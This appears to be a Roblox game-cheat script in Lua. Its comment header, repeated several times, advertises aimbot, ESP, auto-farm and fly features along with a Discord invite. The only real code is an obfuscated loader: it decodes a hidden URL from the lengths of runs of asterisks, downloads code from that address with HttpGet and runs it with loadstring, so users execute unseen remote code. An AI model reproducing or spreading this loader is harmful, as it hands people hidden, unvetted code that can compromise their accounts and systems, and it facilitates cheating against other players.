--CREDS VIPER
-- JOIN THE DISCORD - https://discord.gg/ZjnMetfUDN
--FEATURES
-- Auto Farm Player
--Instant Escape(OP)
--Auto Decrease Clicks
--Aimbot
--ESP
--AutoSpin Fast and Slow
--Walkspeed
--Fly (Toggle E)
--HipHeight
--Name Tag Displays
--CREDS VIPER
-- JOIN THE DISCORD - https://discord.gg/ZjnMetfUDN
--FEATURES
-- Auto Farm Player
--Instant Escape(OP)
--Auto Decrease Clicks
--Aimbot
--ESP
--AutoSpin Fast and Slow
--Walkspeed
--Fly (Toggle E)
--HipHeight
--Name Tag Displays

--CREDS VIPER
-- JOIN THE DISCORD - https://discord.gg/ZjnMetfUDN
--FEATURES
-- Auto Farm Player
--Instant Escape(OP)
--Auto Decrease Clicks
--Aimbot
--ESP
--AutoSpin Fast and Slow
--Walkspeed
--Fly (Toggle E)
--HipHeight
--Name Tag Displays

--CREDS VIPER
-- JOIN THE DISCORD - https://discord.gg/ZjnMetfUDN
--FEATURES
-- Auto Farm Player
--Instant Escape(OP)
--Auto Decrease Clicks
--Aimbot
--ESP
--AutoSpin Fast and Slow
--Walkspeed
--Fly (Toggle E)
--HipHeight
--Name Tag Displays

function ZosNYTcVjDEdDAIoTxkqogoOvwIShgihLpNfuMULuyDmRALQaYzkjZkejkhUXmENBLZEvgmDOqSbLGalkdDvgE(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


loadstring(game:HttpGet(ZosNYTcVjDEdDAIoTxkqogoOvwIShgihLpNfuMULuyDmRALQaYzkjZkejkhUXmENBLZEvgmDOqSbLGalkdDvgE({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','***********************************************************************************','************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************************','***********************************************************************************************************','*******************************************************************************************************************','***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*******************************************************************************************************************','***********************************************','********************************************************************************','************************************************************************************************************','*******************************************************************************************************************','*********************************************','*******************************************************************','*************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*********************************************','***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*********************************************','**************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*******************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','**************************************************'})))()    
--CREDS VIPER
-- JOIN THE DISCORD - https://discord.gg/ZjnMetfUDN
--FEATURES
-- Auto Farm Player
--Instant Escape(OP)
--Auto Decrease Clicks
--Aimbot
--ESP
--AutoSpin Fast and Slow
--Walkspeed
--Fly (Toggle E)
--HipHeight
--Name Tag Displays

--CREDS VIPER
-- JOIN THE DISCORD - https://discord.gg/ZjnMetfUDN
--FEATURES
-- Auto Farm Player
--Instant Escape(OP)
--Auto Decrease Clicks
--Aimbot
--ESP
--AutoSpin Fast and Slow
--Walkspeed
--Fly (Toggle E)
--HipHeight
--Name Tag Displays
